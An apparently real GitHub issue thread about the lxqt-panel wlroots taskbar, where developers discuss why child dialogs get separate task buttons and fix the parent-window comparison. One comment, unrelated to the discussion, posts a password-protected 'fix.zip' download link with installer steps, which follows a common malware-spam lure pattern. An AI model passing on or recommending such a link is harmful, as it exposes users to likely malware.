### ISSUE TITLE
Incorrect handling of parent windows in wlroots taskbar

### ISSUE THREAD

**Issue by tsujan** [lxqt/lxqt-panel#2097]
In the wlroots taskbar, the child dialog of a window has a separate task button. Although the code can be modified easily to result in a single task button for a window and its child dialog, the activation state of that button cannot be determined, for the following reason.

This function cannot be used for knowing whether the parent of a child window is the same as another window:

https://github.com/lxqt/lxqt-panel/blob/36a6e03a59dda1ab5d1397fd70ea37dfd1c70b04/panel/backends/wayland/wlroots/lxqttaskbarwlrwm.h#L85

The reason is that, with every call to `new LXQtTaskbarWlrootsWindow()`, it gives a different number.

When parent windows can't be compared to each other in this way, the whole logic of `transients` fails:

https://github.com/lxqt/lxqt-panel/blob/36a6e03a59dda1ab5d1397fd70ea37dfd1c70b04/panel/backends/wayland/wlroots/lxqtwmbackend_wlr.h#L90

A quick workaround is to allow different task buttons for a window and its child windows in a self-consistent way by removing the logic of  `transients` (I use this workaround for now), but the ideal solution is having a single task button by correcting the underlying logic somehow.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcusbritanicus** [comment]
> The reason is that, with every call to new LXQtTaskbarWlrootsWindow(), it gives a different number.

I was pretty sure that we could recover the actual number every time. Well, in such a case, we can simply make a hash-map of `WId` and `LXQtTaskbarWlrootsWindow*` object. That should solve the problem of comparing the parents, right?

**Comment by tsujan** [comment]
I solved the issue by adding a public variable `::zwlr_foreign_toplevel_handle_v1 *ID = nullptr;` to `LXQtTaskbarWlrootsWindow` and using it for comparisons inside `LXQtTaskbarWlrootsBackend`. Now there is a single task button for a window and its child dialog, and its activation state is correct.

But, I'm afraid, the problem is deeper. Again, because of calls to `new LXQtTaskbarWlrootsWindow()`, a hierarchical parenthood can't be detected, such that if a child dialog has another child dialog, the activation state isn't correct. I'll try to find a solution for that too...
